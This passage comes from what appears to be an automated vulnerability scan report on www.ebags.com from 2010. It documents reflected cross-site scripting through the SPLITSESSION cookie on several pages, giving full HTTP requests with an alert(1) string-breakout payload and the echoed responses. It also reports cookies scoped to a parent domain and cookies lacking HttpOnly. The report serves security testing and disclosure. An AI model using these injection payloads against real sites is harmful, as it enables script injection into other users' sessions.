Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C40fea'%3balert(1)//640b3c4d3a9; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:45 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 9160

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="/style_IE.css" type="text/css">
<script language="JavaScript" type="text/javascript">
v
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|40fea';alert(1)//640b3c4d3a9');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.72. http://www.ebags.com/rewards/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4928f'%3balert(1)//901a0f6a2f6 was submitted in the SPLITSESSION cookie. This input was echoed as 4928f';alert(1)//901a0f6a2f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rewards/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C4928f'%3balert(1)//901a0f6a2f6; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|4928f';alert(1)//901a0f6a2f6');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.73. http://www.ebags.com/shoppingcart/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83e1c'%3balert(1)//6f77a7517bf was submitted in the SPLITSESSION cookie. This input was echoed as 83e1c';alert(1)//6f77a7517bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /shoppingcart/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C83e1c'%3balert(1)//6f77a7517bf; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:06:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 63958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|83e1c';alert(1)//6f77a7517bf');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.74. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80efe'%3balert(1)//3406a34fe1c was submitted in the SPLITSESSION cookie. This input was echoed as 80efe';alert(1)//3406a34fe1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm?Ne=100&N=4001+2006737 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C80efe'%3balert(1)//3406a34fe1c; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 114681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|80efe';alert(1)//3406a34fe1c');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.75. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/car_travel_accessories/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf5a'%3balert(1)//c7e07e7fbd8 was submitted in the SPLITSESSION cookie. This input was echoed as bdf5a';alert(1)//c7e07e7fbd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /travel_accessories/car_travel_accessories/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cbdf5a'%3balert(1)//c7e07e7fbd8; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|bdf5a';alert(1)//c7e07e7fbd8');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.76. http://www.ebags.com/travel_accessories/department/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/department/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a7b'%3balert(1)//3fe6ba4f5e4 was submitted in the SPLITSESSION cookie. This input was echoed as 55a7b';alert(1)//3fe6ba4f5e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /travel_accessories/department/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C55a7b'%3balert(1)//3fe6ba4f5e4; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:14 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:14 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|55a7b';alert(1)//3fe6ba4f5e4');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.77. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16d6b'%3balert(1)//184a31eb581 was submitted in the SPLITSESSION cookie. This input was echoed as 16d6b';alert(1)//184a31eb581 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm?Ne=100&N=4001+20013816 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C16d6b'%3balert(1)//184a31eb581; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=808CF272DALERT281292D27269B66DFCDF; expires=Sun, 02-Jan-2011 14:19:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','808CF272DALERT281292D27269B66DFCDF');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|16d6b';alert(1)//184a31eb581');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.78. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9170f'%3balert(1)//003e259fe6f was submitted in the SPLITSESSION cookie. This input was echoed as 9170f';alert(1)//003e259fe6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /travel_accessories/travel_electronics_cases/category_search/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C9170f'%3balert(1)//003e259fe6f; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:29 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:18:29 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 127384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|9170f';alert(1)//003e259fe6f');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

2. Cookie scoped to parent domain previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

3. Cookie without HttpOnly flag set previous next
There are 59 instances of this issue:

/product/case-logic/sony-psp-game-case/120830
/
/blocks/ajax/certonaajax.cfm
/blocks/ajax/persistentCart.cfm
/blocks/ajax/productEDD.cfm
/blocks/dsp_non_discountable_brands.cfm
/blocks/dsp_prop65.cfm
/brand/athalon
/brand/bosca
/brand/burton
/brand/eagle-creek
/brand/fleurville
/brand/hobo-international
/brand/hurley
/brand/ju-ju-be
/brand/kalencom
/brand/lego
/brand/lodis
/brand/michael-michael-kors-watches
/brand/quiksilver
/brand/timi-and-leslie
/brands/index.cfm
/category/backpack-handbags/20036676
/category/carry-on-luggage/20048891
/category/clutches/20036679
/category/clutches/20048616
/category/cross-body-bags/20037212
/category/handbags/10014
/category/handbags/10014/h/sale
/category/hobos/20036674
/category/hobos/20048614
/category/travel-accessories/20014443
/department/backpacks
/department/bags-by-ebags
/department/business-and-laptop
/department/designer-handbags
/department/handbags
/department/kids-and-baby
/department/luggage
/department/messenger-bags
/department/sale
/department/snow-and-skate
/department/sports-and-duffels
/department/travel-accessories
/department/wallets-and-accessories
/help/
/help/index.cfm
/info/Compare/index.cfm
/info/index.cfm
/info/ratings/index.cfm
/members/index.cfm
/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617
/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538
/products/index.cfm
/products/view/ZoomColorsViews.cfm
/rewards/index.cfm
/shoppingcart/index.cfm
/travel_accessories/car_travel_accessories/category_search/index.cfm
/travel_accessories/travel_electronics_cases/category_search/index.cfm

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=495108; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
CFTOKEN=39324650; domain=.ebags.com; expires=Tue, 24-Dec-2019 13:55:59 GMT; path=/
SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:55:59 GMT; path=/
ACCT=guest; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

3.2. http://www.ebags.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
